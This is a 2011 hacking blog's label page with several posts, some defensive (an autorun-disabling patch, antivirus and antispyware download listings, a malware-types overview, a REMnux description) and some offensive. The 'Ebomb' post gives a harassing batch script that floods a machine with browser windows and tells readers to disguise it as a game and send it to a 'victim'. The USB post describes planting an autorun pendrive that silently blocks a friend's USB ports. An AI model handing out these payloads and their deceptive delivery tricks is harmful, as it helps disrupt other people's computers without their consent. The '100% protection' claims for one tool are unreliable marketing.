Showing posts with label Hacking Virus. Show all posts
Showing posts with label Hacking Virus. Show all posts

Thursday, 29 September 2011

Disable autorun function of windows to protect from virus

This patch will allow you to disable autorun feature of operating system. Virus always use Autorun feature to spread itself from pendrive or other media. We can also disable autorun feature from windows registry but it will not disable this feature permanently. Use this patch to disable it permanently
Download Link
After running this patch autorun feature will be permanently disabled from windows. No pendrive with autorun virus can affect your system.
:)

Ebomb a virus for fun


This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type

@echo off
start iexplore
start notepad
start firefox


and save it as anyname.bat (note: paste the code with "start " in many times to annoy them)



you can also do some additional stuff like enter the message for victim eg. msg * "(Now your pc is getting Hacked)"
and also you can open some websites to irritate victim eg.
start iexplore "
www.ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it .............. :D

(Sample eg.
@echo off
msg * "(sorry buddy but you just f*$%d your self)"
start iexplore "
ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad



and then simply save it as "anyname.bat"

Note : The only way to get out of any ebomb attack is simply by System restart




please comment below if this post is useful for you..
:)

remove common effects of virus by virus effect remover 2.9


Virus effect remover | 1.8 MB
Virus effect remover is a nice tool to remove all the common effects caused by virus. It helps you to monitor your system process and helps you to easily delete autorun.inf file from the system and removable media.

 Features:


Remove Error: After cleaning virus from the system run this to unblock the virus infected tools such as task manager, registry editor cmd and many other windows tools.
Generate Process list:
Find Clone file:
unlock a file from a process:
delete a locked file:
block a specific virus:

This software enables your Admin restricted application and remove the changes which a virus does to protect itself.

It enables : 
           1: Registry Tools (e.g : regedit)
           2: Task manager
           3: Group Policy Editor (e.g. gpedit.msc)
           4: Run command option in start Menu
           5: Folder Option in Explorer & Control panel
           6: Update check
           7: File Menu
           8: Find Menu
           9: Log Off
          10: Task Bar

It repairs :
           1: Folder Option Show Hidden Tab
           2: Folder Option Show Supper Hidden Tab


Requirement:

  1. windows
  2. DotNet framework



Download Here:
http://www.ziddu.com/downloadlink/12847867/viruseffectremover.rar

Protect your system from USB viruses using Autorun Virus Remover 3.0





Autorun Virus Remover can detect and clean hundreds of usb/autorun viruses and it will block viruses and trojans trying to attack when USB device is inserted. Autorun Virus Remover provides 100% protection against any malicious programs trying to attack via USB storage(USB drive?USB stick?pen drive?flash drive?flash card?secure digital card?removable storage?portable storage?ipod?media player).


Compare Autorun Virus Remover with other antivirus solutions, you will find out its highlights: Autorun Virus Remover provides 100% protection against any threats via USB drive, however, the majority of other products are unable even to guarantee 90% protection. Autorun Virus Remover can detect and clean the usb virus/worm/trojan such as Ravmon,auto.exe in your computer or usb drive,it could solve the problem that unable to open a drive by double clicking. It also removes the leftovers of virus by removing the autorun.inf files and cleaning up your system registry, so you won’t see the autoplay item anymore.



Download links:

Spyware removal tool | download Spybot Search & Destroy 1.6.2


Spyware removal tool


Spybot Search & Destroy 1.6.2 Portable | 19.7 MB

Spyware is a special kind of threat and common anti-virus softwares do not yet cover. Many times you installed and software from a website or allow any script of a website, you are going to allow an spyware to enter in your system. You can predict this by uncommon behaviour in your computer. If you see new toolbars in your browser that you didn’t  install, if your browser crashes, or if you browser home page has changed without your knowing, you most probably have
spyware. But even if you don’t see anything, you may be infected, because more and more spyware is emerging that is silently tracking your surfing behaviour to create a marketing profile of you that will be sold to advertisement companies.

Spybot-S&D can also clean usage tracks, an interesting function if you share your computer with other users and don’t want them to see what you worked on. And for professional users, it allows to fix some registry inconsistencies and extended reports.

Spybot-S&D can start in two modes: Easy mode for new users who want just the basic features, and Advanced mode for professional users and those who want more control. Both modes are available in the free version.

Spybot – Search & Destroy now officially “Works with Windows7″

What is new in 1.6.2 Rev 2
Malware + Fraud.SecurityTool + Fraud.Sysguard + Win32.Chinky.gen + Win32.FraudLoad + Win32.FraudLoad.edt + Win32.Renos
Trojan + Win32.Agent.sn + Win32.Muollo ++ Win32.OnLineGames.bxya ++ Win32.OnLineGames.iisa ++ Win32.OnLineGames.kvqa ++ Win32.OnLineGames.lpva ++ Win32.OnLineGames.lwia ++ Win32.OnLineGames.mhva ++ Win32.OnLineGames.mofa ++ Win32.OnLineGames.mqza ++ Win32.OnLineGames.trna
Total: 1950290 fingerprints in 673779 rules for 6021 products.



Homepage – http://spybot.info


Download links:

Usb Port Hacking | block/unblock Usb ports


Hacking usb ports
block/unblock Usb ports

Today i am going to write about a cool hack. You can block you friends USB ports easily without even working on that system. You just need to compile these C programs. one program is for blocking USB ports and another C program is for unblocking. This trick is for windows computer because i am using registry editing for blocking and unblocking.
this pack contains

  1. block_usb_port.c  (compile this and create block.exe)
  2. unblock_usb_port.c (compile this and create unblock.exe)



follow these steps:




  1. compile and make exe of following files.
  2. create an autorun pendrive which would run block.exe on inserting usb device.
  3. give this USB disk to any of your friend.
  4. you can directly send this exe to your friend.
when you want to unblock usb ports run unblock.exe 





Download Here:
http://www.ziddu.com/download/13396349/Usb_port_hack.rar.html

Computer Security Threats | malicious programs | Malwares


Computer Security Threats | malicious programs | Malwares

Computer security threats or Malicious code or Malwares comes in a wide variety of forms and is distributed through an ever growing number of delivery mechanisms. In general malicious program is any software that impedes the normal operation of a computer or networking device. This software most often executes without the user's consent. 
Understanding how malwares works can help you develop defensive strategies, select 
computer security products and train employees on how to identify potential threats.

Types of computer security threats
These can be roughly broken down into types according to the malware's method of  operation. Anti-"virus" software, despite its name, is able to detect all of these types of malware. There are  following malware types.
  • E-mail and other types of viruses
  • Trojans and other backdoors
  • Worms
  • Blended threats
  • Time bombs
  • Spyware
  • Adware
  • Stealware
  • Zombies


when a piece of malicious code starts infecting large number of computers, it is said to be 'in wild'.

Threat level of these malwares refers to it's potential to spread and infect computers. Threat level can be shown in 4 catagories.
  1. NO -  may not function well
  2. Low - requires human assistance in replicating and moving from computer to computer
  3. Medium - slow infection speed and little damage
  4. High - great infection speed and do considerable damage.
wild list  or threat list refers to malicious code that is wandering around the internet infecting computers. An archive of wild lists and information about the organisation that maintains the list are available at www.wildlist.org

Reverse-Engineering of Malware | REMnux v.2.0



Reverse-Engineering of Malware | REMnux v.2.0 
ReMnux V.2.0 is launched. It is a lightweight Linux distribution tool for assisting malware analysts in reverse-engineering of malicious software.  Visit REMnux's main page for download ReMnux as a virtual appliance and as a Live CD. The distribution of ReMnux is based on Ubuntu and is maintained by Lenny Zeltser. REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that's listening on the appropriate ports.

Malicious Website Analysis
REMnux is also useful for analyzing web-based malware, such as malicious JavaScript, Java programs, and Flash files. It also has tools for analyzing malicious documents, such as Microsoft Office and Adobe PDF files, and utilities for reversing malware through memory forensics. In these cases, malware may be loaded onto REMnux and analyzed directly on the REMnux system without requiring other systems to be present in the lab. 
REMnux includes the updated version of Jsunpack-n, which includes a number of new features, such as proxy support, improved handling of encrypted PDFs, and other updates.
Stunnel is now installed to assist with the interception of SSL sessions in the malware analysis lab.

REMnux now includes the RABCDAsm toolkit for reverse-engineering malicious Flash (SWF) programs. This includes:
  • rabcdasm: ActionScript 3 (ABC) disassembler
  • rabcasm: ABC assembler
  • abcexport: ABC extractor
  • abcreplace: Replaces ABC in SWF files
  • swfdecompress: SWF file decompressor


Read More on Lenny Zeltser's blog

free download McAfee VirusScan Enterprise 8.8



McAfee VirusScan Enterprise 8.8 Multilingual Retail | 44 MB

McAfee® VirusScan® Enterprise is good protection of your desktop and file servers from a wide range of security threats, including viruses, worms, Trojan horses, zombies and potentially unwanted code and programs. This antivirus version takes anti-virus protection to the next level, integrating elements of intrusion prevention and firewall technology into a single solution for PCs and file servers.
This powerful combination delivers truly proactive protection from the newest of today’s threats-including buffer – overflow exploits and blended attacks – and features advanced outbreak management responses to reduce the damage and costs of outbreaks. Everything is managed by McAfee ePolicy Orchestrator® or ProtectionPilot™ for scalable security policy compliance and graphical reporting.

Features:
- Comprehensive McAfee anti-virus protection
- Potentially unwanted program security
- Buffer overflow prevention (IPS feature)
- Complete outbreak response
- Port blocking/lockdown (firewall feature)
- Application monitoring: email engines (firewall feature)
- File blocking, directory lockdown, folder/share blocking (IPS feature)

Download Here

 
Related Posts Plugin for WordPress, Blogger...